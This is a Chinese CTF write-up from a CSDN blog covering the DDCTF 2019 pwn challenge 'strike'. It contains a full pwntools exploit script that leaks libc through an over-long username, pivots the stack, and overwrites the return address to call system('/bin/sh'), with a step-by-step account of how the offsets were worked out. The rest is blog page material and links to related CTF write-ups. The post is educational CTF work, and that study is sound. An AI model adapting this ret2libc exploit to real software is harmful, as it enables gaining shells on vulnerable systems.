2019DDCTF_Pwn_strike/祥讲

最新推荐文章于 2020-11-13 16:57:27 发布
最新推荐文章于 2020-11-13 16:57:27 发布
阅读量239 收藏
点赞数
分类专栏: 赛事复现 文章标签: strike DDCTF pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_42037374/article/details/90316173
版权

注:由于在做iscc的pwn题 发现需要用这个知识点,记录一下。(本题用了几个插件调试,有脚本直接变换插件)

  • 代码审计
    在这里插入图片描述

  • 安全机制
    在这里插入图片描述

  • 考察点
    在这里插入图片描述

  • 思路
    1.先泄露libc(利用read和fprint函数)
    2.改变程序流,利用pc指针将程序流指向esp(栈迁移)
    3.利用返回地址,完成构造

  • EXP

#!/usr/bin/python2
# -*- coding:utf-8 -*-
from pwn import*

debug = 1
context.log_level = "debug"

p =process('./xpwn')
libc = ELF('/lib/i386-linux-gnu/libc.so.6')


p.recvuntil('username: ')
p.send("A"*60)
p.recvuntil("A"*60)
setbuf_addr = p.recv(4)  # 泄露地址 计算libc地址
p.recv(4)   #p.recv(8)
p.recv(4)

#gdb.attach(p)
main_ebp_addr = u32(p.recv(4))   #  
print "[+]setbuf_addr:" +hex(u32(setbuf_addr))  
print "[+]ebp_addr:" +hex(main_ebp_addr)
libc_base = u32(setbuf_addr) - libc.symbols["setbuf"]
system_addr = libc_base + libc.symbols["system"]
bin_sh_addr = libc_base + libc.search("/bin/sh").next()


gdb.attach(p)
p.recvuntil('password: ')
p.sendline('-1')
p.recvuntil('):')

payload = 'A'*68  # password到恢复栈的大小 lea    esp, [ebp - 8]  为此时的栈   代码端
payload += p32(main_ebp_addr + 24)  #恢复栈里面的值为   栈段的值
#payload += 'A'*(96-68-4)   #填充buf  刚好让返回地址  执行system
payload += p32(0) *2
payload += 'a'*(96-68-4-8)   #实际测试在输入字符串的时候只改变了 ecx的值  我们在后面将数据填充到ret就可以了  也有师傅是利用ecx-4的值提前将程序流劫持到ret处,执行shell
#  大牛的构造思路:payload = 'a'*0x44 + p32(ecx-16)+ p32(0) * 2 + p32(system_addr)+p32(0) + p32(bin_sh)

payload += p32(system_addr)
payload += p32(0)
payload += p32(bin_sh_addr)


p.sendline(payload)
p.interactive()
  • gdb

注:主要是利用我们输入数据到,内置函数的位置,然后利用fprint输出 我们想要的函数的地址,达到泄露libc的方法。(填充数据,到达函数位置,用recv接收地址)

  • 解析
    1.p.send("A"*60) :我们为了获取libc的基址 我们需要一个函数作为参考 这里我选取了setbuf作为参考
    2.将断点下在.text:08048610 add esp, 10h(read函数的后一个指令) ,输入用户名后,截断(ctrl+z),然后查找offset的大小(60(0x3c)) 下图
    在这里插入图片描述main_ebp_addr = u32(p.recv(4)):在后面我会需要栈平衡 我们先泄露出esp栈里面的值,作为后面栈平衡用的值
    68如图所示
    在这里插入图片描述
    在这里插入图片描述
    payload = 'A'*68: 这里我们需要先知道password的输入地址,(自己输入一个值,然后断下,查看),通过lea esp, [ebp-8]知道我们需要将我们的入口esp的值要比password要小,我们进行填充将我们的数据从esp开始输入
  • 96是怎么来的
    我们输入password后 (下断点在ebp - 8)
    在这里插入图片描述返回地址
    在这里插入图片描述96 = 数据输入的地方 - 返回地址
    我们将数据填充到返回地址出,利用ret返回地址将system替换达到获取shell的方法

24 = ebp - ecx(输入srart 一直n 知道push ecx)
在这里插入图片描述payload += p32(0)2
payload += ‘A’(96-68-4-8)
注:这两步是覆盖 pop ebx/pop ebp/lea~ 执行 (通过分析程序,我们的程序在输入字符串的时候,只改变了 ecx的值,所以我们只需要还原ecx的值就可以了)
在这里插入图片描述

可能也有和我一样不懂的人,可以下面留言,一起讨论(写博文的时候,太着急,或许有些没写进去,欢迎讨论!)

Jc^
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
DDCTF2019-Writeup
40KO的博客
04-19 4839
目录 WindowsReverse1 WindowsReverse2 confused obfuscating macros 黑盒破解2 北京地铁 MulTzor [PWN] strike Wireshark 联盟决策大会 滴~ Web签到题 Upload-IMG 大吉大利,今晚吃鸡~ Breaking LEM WindowsReverse1 比较基础的一...
DDCTF 2019 逆向题writeup(二)
每昔的博客
04-13 3474
文章目录总结脱壳分析定位关键call逆向分析编写脚本 总结 其实输入只能是0-9和A-F有很大的提示作用,开始没想明白 and和add没看清,走了很多弯路 python模块itertools的排列组合函数 结合IDA分析会简便,但是太烂不想脱壳dump 脱壳分析 首先是一个ASPack 2.12 -> Alexey Solodovnikov。利用ESP定律脱壳。 定位关键call 这个c...
DDCTF writeup
晨暮的博客
04-22 1156
首先来看我们的题目将文件下载进行题目分析,我们会发现,这个图片所占空间较大,超出了平常图片的范围 猜测,图片内隐藏了文件对图片进行字节码分析发现文件内藏有压缩文件对其进行分离发现分理出一个带有密码的压缩文件对压缩包进行破解解压得 进行一顿栅栏,编码等解密,无果。破了很久,最后回头看题目看了的提示得flagDDCTF{x1n9shaNgbIci} ...
BUUCTF:派大星的烦恼
末初的CSDN博客
11-13 964
https://buuoj.cn/challenges#%E6%B4%BE%E5%A4%A7%E6%98%9F%E7%9A%84%E7%83%A6%E6%81%BC 只有两种格式,猜测二进制 "DD"DD""""D"DD""""""DD"""DD"DD""D""DDD""D"D"DD""""""DD""D""""DD"D"D"DD""""D"DD""D"""DD"""""DDD""""D"DD"""D"""DD"""D""DD"D"D"DD"""DD""DD"D"D""DD""DD"DD"""D""
browser_pwn:浏览器pwn,现在主要工作
03-22
浏览器Pwn,顾名思义,是指针对浏览器的安全攻防技术,主要集中在发现并利用浏览器中的漏洞进行攻击。在这个领域,V8_pwn 和 JSC_pwn 是两个关键的子领域,分别关注Google Chrome浏览器的V8 JavaScript引擎和Apple ...
PWM.rar_ARM7 汇编_PWN_pwm arm7
09-22
在ARM7处理器上实现PWM接口,需要理解ARM7架构、汇编语言以及PWN的具体工作原理。 ARM7是ARM公司设计的一系列32位RISC微处理器,以其低功耗、高性能和广泛应用而闻名。在ARM7处理器中,开发者可以使用C语言或汇编...
PWN.rar_AVR PWM_GPS FPGA_PWN_avr_avr pwn
09-23
【标题】"PWN.rar" 是一个包含与 AVR 单片机、PWM 脉冲输出、GPS 和 FPGA 相关资源的压缩包。其中,"AVR_PWM_GPS_FPGA_PWN_avr_avr_pwn" 可能是项目或文件集合的命名,暗示了这些技术的综合应用。 【描述】描述指出...
ciscn-2019-pwn
11-29
【标题】"ciscn-2019-pwn"是一个与网络安全竞赛相关的主题,尤其聚焦于"Pwn"类别,这通常指的是破解或利用程序漏洞来获取系统控制权的挑战。2019年的CISCN(中国互联网安全大会)可能是这个挑战的背景,它是一个汇集...
pwm.zip_PIC_PWN
09-14
标题"PWM.zip_PIC_PWN"暗示了这是一个与微控制器Pic相关的项目,主要涉及的是脉宽调制(PWM)技术的汇编语言源代码。在嵌入式系统中,PIC微控制器是广泛应用的一种微处理器,尤其在控制和信号处理任务中。而PWM是一...
DDCTF2018出题心得
08-24
DDCTF 2018出题心得与题解分享-欧家俊, 什么是好的 CTF 题
CTF中pwn的入门指南
信息安全专题
10-21 6946
CTF中pwn的入门指南 pwn简介: CTF中的pwn指的是通过通过程序本身的漏洞,编写利用脚本破解程序拿到主机的权限,这就需要对程序进行分析,了解操作系统的特性和相关漏洞,是是一个难度比较大的分支。   接下来介绍相关的学习思路(自己总结的,当作参考) 0x01 基础知识准备   pwn相对于web,更需要专业的技能和知识,最主要的是要学会如何分析程序,这就需要有足够的准备 c语言 汇编语言 python 操作系统 linux操作   C语言是最基础的,当下的比赛大部分的pwn题目使用
DDCTF部分WP
dydxdz的博客
04-22 6006
这周去打了DDCTF,花了一周做出了九道题,完成了1000分的梦想。也算是菜鸡打比赛这么久拿到分数最多的一次了,现记录如下: MISC 1、(╯°□°)╯︵ ┻━┻ (╯°□°)╯︵ ┻━┻ d4e8e1f4a0f7e1f3a0e6e1f3f4a1a0d4e8e5a0e6ece1e7a0e9f3baa0c4c4c3d4c6fbb9e1b2e2e5e2b5b4e4b8b7e...
DDCTF2019-WRITEUP
郁离歌丶的博客
05-04 2898
WEB 滴~ 进去之后就看到url一串base64,解两次是flag.jpg,明显文件读取,读一下index.php,发现居然给了博客。这是恶意引流吧,服了。在出题人博客里面找到.practice.txt.swp,然鹅.practice.txt.swp404了,而practice.txt.swp却能访问???佛了。 内容是f1ag!ddctf.php,然后在index.php的源码里面发现他将co...
ddctf 逆向 pwn 部分题解
qq_41071646的博客
04-19 639
这个ddctf 我就第一天玩了 在晚上 0点我把re 1 2 搞定就没有完了 然后 比赛结束 有个学长问我做的如何了。。。。然后他和我说 题型 就是vm 还有 迷宫 然后 让我去看看re3 是vm 然后我就搞了一波 先说pwn吧 直接粘上我志琦哥的代码。。。。。 #coding:utf-8 from pwn import * context.lo...
BUUCTF
hao2580的博客
04-11 687
[MRCTF2020]你传你????呢 知识点:文件上传 1.Apache服务器 上传.htaccess 文件,bp抓包 AddType application/x-httpd-php .jpg(将jpg当做PHP解析) 2.MIME类型验证绕过:修改Content-type为:image/jpeg 上传 再上传jpg,蚁剑连上,url http://b29acfc2-511c-4e8d-980...
Linux mount命令
dibeifu2462的博客
10-19 1459
Linux mount命令是经常会使用到的命令,它用于挂载Linux系统外的文件。 语法 mount [-hV] mount -a [-fFnrsvw] [-t vfstype] mount [-fnrsvw] [-o options [,...]] device | dir mount [-fnrsvw] [-t vfstype] [-o options] device di...
ctf学习(web题二)
zwish的信安之路
06-25 643
web 下面是做bugku上一些web的总结 内容链接
2020DDCTF we_love_free C++ vector
snowleopard_bin的博客
10-07 191
vector的特性扩容特性,1,2,4,8,16......个元素,每次超过阈值,就会将之前的堆块释放,并重新申请大堆块。对应的chunk大小为0x20,0x20,0x50,0x90...... 这题漏洞在于show函数push 0xaabbccdd之后如果vector进行了扩容,就会将之前的chunk释放,但是begin全局变量还是指向原来的堆块,形成UAF漏洞。 利用方式是覆盖在bss段中的std::cout/std::cin的虚表指针为one_gadget #-*- coding:utf-8.
我的ctf刷题wp笔记
最新发布
03-25
本笔记记录了作者在CTF(Capture The Flag)比赛中的刷题经验,特别关注于一道名为"whitegive_pwn"的挑战。该题目涉及到pwn(Payload Writing and Exploitation)技术中的栈溢出(Stack Overflow)漏洞利用,主要...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值